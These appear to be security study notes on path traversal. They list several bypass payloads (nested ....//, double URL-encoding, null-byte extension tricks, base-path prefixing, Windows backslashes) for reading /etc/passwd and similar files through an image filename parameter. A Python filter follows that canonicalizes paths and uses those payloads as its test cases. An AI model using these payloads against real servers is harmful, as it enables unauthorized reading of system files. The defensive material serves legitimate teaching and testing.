Path Traversal
The application blocks traversal sequences but treats the supplied filename as relative to an absolute path, so it can be exploited by supplying an absolute path to the target file, for example /etc/passwd, as the payload.

Images on the target are loaded using the filename parameter, and the application defends against traversal attacks by stripping path traversal sequences. Exploit this with a nested payload such as ....//....//....//....//etc/passwd (stripping ../ once from ....// leaves ../ behind).

A superfluous (double) URL-encoded payload such as ..%252f..%252f..%252fetc/passwd can bypass the application's security controls.

Where the application requires the filename to start with the expected base folder, beginning the payload with that original path and then appending the traversal sequence, as in /var/www/images/../../../etc/passwd, bypasses the protection.

Where the application requires an image extension, a null byte followed by the extension convinces the control that an image is being requested, and the ../../../etc/passwd%00.png payload succeeds.

Double URL-encode the file path traversal. For example, ../../../../../../../../../../etc/hostname double URL-encoded becomes %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fhostname

Windows accepts both ../ and ..\ as directory traversal syntax; for example, requesting loadImage?filename=..\..\..\windows\win.ini on a Windows target identifies a valid path traversal.
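The bypasses above all defeat filters that strip, prefix-check or suffix-check the raw input. The defensive counterpart is to decode once, canonicalize, and only then check that the result is still inside the image root. The following is an added example written for these notes, not code from the original page or from the target application; the base directory /var/www/images and the extension allowlist are assumptions. It runs each payload quoted above through the check and also shows a legitimate request that still works.

```python
import posixpath
from urllib.parse import unquote

# Assumed image root for this example (matches the path used in the payloads above).
BASE_DIR = "/var/www/images"
# Assumed allowlist of image extensions the loadImage endpoint should serve.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}


class UnsafePath(ValueError):
    """Raised when the supplied filename must not be served."""


def safe_image_path(user_filename: str, base_dir: str = BASE_DIR) -> str:
    """Return the canonical on-disk path for a user-supplied filename, or raise UnsafePath."""
    # Decode exactly once, the same number of times the web framework does.
    # Decoding in a loop is what lets ..%252f turn into ../ and reach the file system.
    name = unquote(user_filename)

    # A null byte never belongs in a filename; reject rather than let a lower
    # layer truncate "passwd\x00.png" to "passwd".
    if "\x00" in name:
        raise UnsafePath("null byte in filename")

    # Windows treats backslash as a separator, so normalize it before checking.
    name = name.replace("\\", "/")

    # The endpoint serves files relative to the image root only.
    if name.startswith("/"):
        raise UnsafePath("absolute path not allowed")

    # Canonicalize: collapse ".", "..", and repeated slashes. Unlike stripping
    # "../", this resolves "....//" and "images/../.." to what they really mean.
    base = posixpath.normpath(base_dir)
    full = posixpath.normpath(posixpath.join(base, name))

    # Containment check on the canonical path, not on the raw input.
    if full != base and not full.startswith(base + "/"):
        raise UnsafePath("path escapes image root")

    # Extension allowlist applied after canonicalization, so it cannot be
    # satisfied by a suffix that a later layer would discard.
    if posixpath.splitext(full)[1].lower() not in ALLOWED_EXT:
        raise UnsafePath("extension not allowed")

    return full


def is_allowed(user_filename: str) -> bool:
    """Convenience wrapper: True if the filename would be served."""
    try:
        safe_image_path(user_filename)
        return True
    except UnsafePath:
        return False


# Payloads quoted in the notes above, used here as test input for the filter.
PAYLOADS = [
    "/etc/passwd",
    "....//....//....//....//etc/passwd",
    "..%252f..%252f..%252fetc/passwd",
    "/var/www/images/../../../etc/passwd",
    "../../../etc/passwd%00.png",
    "%252e%252e%252f" * 10 + "etc%252fhostname",
    "..\\..\\..\\windows\\win.ini",
]


def check_all(payloads=PAYLOADS) -> dict:
    """Map each payload to whether the filter would serve it (all should be False)."""
    return {p: is_allowed(p) for p in payloads}


if __name__ == "__main__":
    for payload, allowed in check_all().items():
        print(f"{'SERVED ' if allowed else 'blocked'}  {payload}")
    print("legitimate:", safe_image_path("sub/../cat.png"))
```

Two design points matter here. First, the order is decode once, canonicalize, then check; any check performed on the raw string can be bypassed by one of the encodings above. Second, the containment test compares the canonical path against the base directory, so it does not matter whether the attacker prefixed the payload with /var/www/images or nested ....// sequences; what is compared is where the path actually lands.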
Intruder payloads list:
Headers to bypass access to files